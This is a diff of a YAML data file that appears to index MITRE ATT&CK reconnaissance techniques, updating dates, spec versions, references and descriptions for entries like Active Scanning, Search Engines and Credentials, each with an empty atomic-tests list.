         description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
       - source_name: Detectify Slack Tokens
         description: Detectify. (2016, April 28). Slack bot token leakage exposing
           business critical information. Retrieved October 19, 2020.
@@ -55089,11 +55786,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:37:31.317Z'
       name: Vulnerability Scanning
       description: |-
         Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -55133,9 +55829,8 @@ reconnaissance:
         url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596:
     technique:
@@ -55197,7 +55892,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595:
     technique:
@@ -55223,7 +55917,7 @@ reconnaissance:
         url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
         description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
           October 20, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T20:58:13.661Z'
       name: Active Scanning
       description: |-
         Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55244,8 +55938,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.002:
     technique:
@@ -55310,7 +56002,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1598.004:
     technique:
@@ -55358,7 +56049,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.006:
     technique:
@@ -55380,7 +56070,7 @@ reconnaissance:
         url: https://nmap.org/book/firewalls.html
         description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
           and Intrusion Detection Systems. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:54.275Z'
       name: Network Security Appliances
       description: |-
         Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -55396,34 +56086,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
-      type: attack-pattern
-      created: '2020-10-02T16:50:12.809Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1593.002
-        url: https://attack.mitre.org/techniques/T1593/002
-      - source_name: SecurityTrails Google Hacking
-        url: https://securitytrails.com/blog/google-hacking-techniques
-        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-      - source_name: ExploitDB GoogleHacking
-        url: https://www.exploit-db.com/google-hacking-database
-        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
-          October 23, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T19:19:47.758Z'
       name: Search Engines
       description: |-
         Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -55432,15 +56098,38 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+      created: '2020-10-02T16:50:12.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1593/002
+        external_id: T1593.002
+      - source_name: SecurityTrails Google Hacking
+        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+      - source_name: ExploitDB GoogleHacking
+        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+          October 23, 2020.
+        url: https://www.exploit-db.com/google-hacking-database
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.002:
     technique:
@@ -55462,7 +56151,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:36:58.964Z'
       name: Business Relationships
       description: |-
         Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -55478,8 +56167,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.003:
     technique:
@@ -55540,29 +56227,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1589.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
-      type: attack-pattern
-      created: '2020-10-02T14:57:15.906Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1589.003
-        url: https://attack.mitre.org/techniques/T1589/003
-      - source_name: OPM Leak
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
-        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:09:45.795Z'
       name: Employee Names
       description: |-
         Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -55571,15 +56239,34 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+      created: '2020-10-02T14:57:15.906Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1589/003
+        external_id: T1589.003
+      - source_name: OPM Leak
+        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.004:
     technique:
@@ -55605,7 +56292,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:35:09.668Z'
       name: Client Configurations
       description: |-
         Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -55623,47 +56310,10 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Philip Winther
-      - Sebastian Salla, McAfee
-      - Robert Simmons, @MalwareUtkonos
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
-      type: attack-pattern
-      created: '2020-10-02T17:08:57.386Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1598.002
-        url: https://attack.mitre.org/techniques/T1598/002
-      - source_name: Sophos Attachment
-        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
-        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
-          links – when phishers bring along their own web pages. Retrieved October
-          20, 2020.'
-      - source_name: GitHub Phishery
-        url: https://github.com/ryhanson/phishery
-        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
-          23, 2020.
-      - source_name: Microsoft Anti Spoofing
-        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
-        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
-          Retrieved October 19, 2020.
-      - source_name: ACSC Email Spoofing
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
-        description: Australian Cyber Security Centre. (2012, December). Mitigating
-          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-05-31T04:18:44.568Z'
       name: Spearphishing Attachment
       description: |-
         Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55672,19 +56322,55 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Philip Winther
+      - Sebastian Salla, McAfee
+      - Robert Simmons, @MalwareUtkonos
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
         accounts receiving messages from a single unusual/unknown sender. Filtering
         based on DKIM+SPF or header analysis can help detect when the email sender
         is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+      created: '2020-10-02T17:08:57.386Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1598/002
+        external_id: T1598.002
+      - source_name: ACSC Email Spoofing
+        description: Australian Cyber Security Centre. (2012, December). Mitigating
+          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: Sophos Attachment
+        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+          links – when phishers bring along their own web pages. Retrieved October
+          20, 2020.'
+        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+      - source_name: Microsoft Anti Spoofing
+        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+          Retrieved October 19, 2020.
+        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+      - source_name: GitHub Phishery
+        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+          23, 2020.
+        url: https://github.com/ryhanson/phishery
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.004:
     technique:
@@ -55707,7 +56393,7 @@ reconnaissance:
         description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
           Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
           You Can Do About It. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:47:55.905Z'
       name: CDNs
       description: |-
         Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -55723,8 +56409,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591:
     technique:
@@ -55750,7 +56434,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.343Z'
       name: Gather Victim Org Information
       description: |-
         Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -55766,8 +56450,6 @@ reconnaissance:
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590:
     technique:
@@ -55795,7 +56477,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:23.229Z'
       name: Gather Victim Network Information
       description: |-
         Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -55811,12 +56493,10 @@ reconnaissance:
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593:
     technique:
-      modified: '2022-10-18T22:48:33.286Z'
+      modified: '2024-09-12T19:19:47.759Z'
       name: Search Open Websites/Domains
       description: |-
         Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -55825,16 +56505,16 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -55847,8 +56527,8 @@ reconnaissance:
         external_id: T1593
       - source_name: SecurityTrails Google Hacking
         description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-        url: https://securitytrails.com/blog/google-hacking-techniques
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
       - source_name: Cyware Social Media
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -55859,52 +56539,50 @@ reconnaissance:
         url: https://www.exploit-db.com/google-hacking-database
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1597:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
-      type: attack-pattern
-      created: '2020-10-02T17:01:42.558Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1597
-        url: https://attack.mitre.org/techniques/T1597
-      - source_name: D3Secutrity CTI Feeds
-        url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
-        description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
-          Intelligence Feeds. Retrieved October 20, 2020.
-      - source_name: ZDNET Selling Data
-        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
-        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
-          73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-04T13:12:14.469Z'
       name: Search Closed Sources
       description: |-
-        Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+        Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
 
         Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Barbara Louis-Sidney (OWN-CERT)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
+      type: attack-pattern
+      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+      created: '2020-10-02T17:01:42.558Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1597
+        external_id: T1597
+      - source_name: ZDNET Selling Data
+        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+          73 million user records on the dark web. Retrieved October 20, 2020.
+        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1592.003:
     technique:
@@ -55926,7 +56604,7 @@ reconnaissance:
         url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
         description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
           source code and proprietary data dumped online. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:22:46.759Z'
       name: Firmware
       description: |-
         Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -55942,8 +56620,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.002:
     technique:
@@ -55969,7 +56645,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:33:19.596Z'
       name: Software
       description: |-
         Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -55987,8 +56663,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.001:
     technique:
@@ -56010,7 +56684,7 @@ reconnaissance:
         url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:52:40.958Z'
       name: Social Media
       description: |-
         Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -56026,12 +56700,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.001:
     technique:
-      modified: '2023-04-14T23:29:10.396Z'
+      modified: '2024-10-10T13:45:01.069Z'
       name: Credentials
       description: "Adversaries may gather credentials that can be used during targeting.
         Account credentials gathered by adversaries may be those directly associated
@@ -56041,17 +56713,20 @@ reconnaissance:
         elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
         Adversaries may also compromise sites then add malicious content designed
         to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
-        Credential information may also be exposed to adversaries via leaks to online
-        or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
-        breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
-        Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
-        GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
-        may also purchase credentials from dark web or other black-markets. Finally,
-        where multi-factor authentication (MFA) based on out-of-band communications
-        is in use, adversaries may compromise a service provider to gain access to
-        MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
-        this information may reveal opportunities for other forms of reconnaissance
-        (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+        (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+        Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+        GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+        based on out-of-band communications is in use, adversaries may compromise
+        a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+        Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+        adversaries via leaks to online or other accessible data sets (ex: [Search
+        Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+        repositories, etc.). Adversaries may purchase credentials from dark web markets,
+        such as Russian Market and 2easy, or through access to Telegram channels that
+        distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+        2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+        Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+        for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
